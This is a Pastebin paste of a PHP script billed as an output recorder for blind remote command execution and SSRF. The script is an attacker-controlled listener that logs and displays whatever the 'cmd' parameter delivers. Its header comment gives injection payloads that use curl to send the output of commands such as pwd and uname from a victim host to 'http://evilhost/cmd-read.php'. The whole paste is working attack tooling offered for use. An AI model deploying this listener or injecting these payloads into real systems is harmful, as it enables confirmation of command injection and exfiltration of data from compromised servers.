daily pastebin goal
59%
SHARE
TWEET

Command Output Recorder (Blind RCE & SSRF)

zerobyte-id May 16th, 2018 265 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. /*
  3.     BLIND COMMAND INJECTION - OUTPUT RECORDER WITH CURL (WEB BASED)
  4.     Coded By ZeroByte.ID (Schopath)
  5.  
  6.     [+] Payload :
  7.     # curl -s "http://evilhost/cmd-read.php?cmd=$(pwd)";
  8.     # curl -s --data-urlencode "cmd=$(uname -a)" -X POST "http://evilhost/cmd-read.php"
  9. */
  10.  
  11. error_log(0);
  12. error_reporting(0);
  13.  
  14. $file = "cmdrec_".md5(date("Ymd")).".log";
  15.  
  16. if(!file_exists($file)) {
  17.     file_put_contents("$file", "");
  18. }
  19.  
  20. if(isset($_GET['cmd'])) {
  21.     $record = $_GET['cmd'];
  22.     $addcread = fopen($file, "a") or die("Failed open to open file!");
  23.     fwrite($addcread, "--- Updated on ".date("Y-m-d h:i:s")." -----\n");
  24.     fwrite($addcread, $record."\n");
  25.     fwrite($addcread, "----------------------------------------\n");
  26.     fclose($addcread);
  27. }
  28. else if (isset($_POST['cmd'])) {
  29.     $record = $_POST['cmd'];
  30.     $addcread = fopen($file, "a") or die("Failed open to open file!");
  31.     fwrite($addcread, "--- Updated on ".date("Y-m-d h:i:s")." -----\n");
  32.     fwrite($addcread, $record."\n");
  33.     fwrite($addcread, "----------------------------------------\n");
  34.     fclose($addcread);
  35. }
  36. else {
  37.     echo "<pre>\n";
  38.     echo "<b><big>##### BLIND COMMAND INJECTION - OUTPUT RECORDER #####</big></b><br>\n";
  39.     print_r(file_get_contents($file));
  40.     echo "</pre>\n";
  41.     echo "<form method=\"post\"><input type=\"submit\" name=\"reset\" value=\"Reset Log\"></form>";
  42.     if(isset($_POST['reset'])) {
  43.         $addcread = fopen($file, "w") or die("Failed open to open file!");
  44.         fwrite($addcread, "");
  45.         fclose($addcread);
  46.     }
  47. }
  48. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top